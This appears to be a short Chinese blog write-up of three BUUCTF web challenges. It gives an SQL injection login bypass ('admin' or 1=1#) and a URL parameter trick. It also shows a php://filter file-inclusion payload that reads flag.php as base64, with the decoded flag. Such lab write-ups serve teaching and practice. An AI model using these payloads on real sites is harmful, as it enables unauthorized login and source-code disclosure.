buuctf-web-wp
[极客大挑战2019]EasySQL
1 | admin' or 1=1# |
‘#’是注释符,相当于
1 | SELECT * FROM users WHERE username='admin' or 1=1 --' AND password='123' |
[极客大挑战2019]Havefun1
查看网页源代码,有注释
1 | <!-- |
在url中添加get参数为cat=dog
[ACTF2020新生赛]Include
点进tips
1 | http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=flag.php |
根据file=flag.php可知,可能考察文件包含
使用php伪协议读取源码(php://filter)
1 | php://filter/convert.base64-encode/resource=目标文件 |
即
1 | http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=flag.php |
得到:PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YmQzZGM3YjEtNTNjNC00NTY1LTg2MDItOGZhOTUwOGUyOGY1fQo=
进行base64解码
Base64仅包含 A-Z、a-z、0-9、+、/ 和填充符 =
得到flag0
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 QingMaxLim-Blog!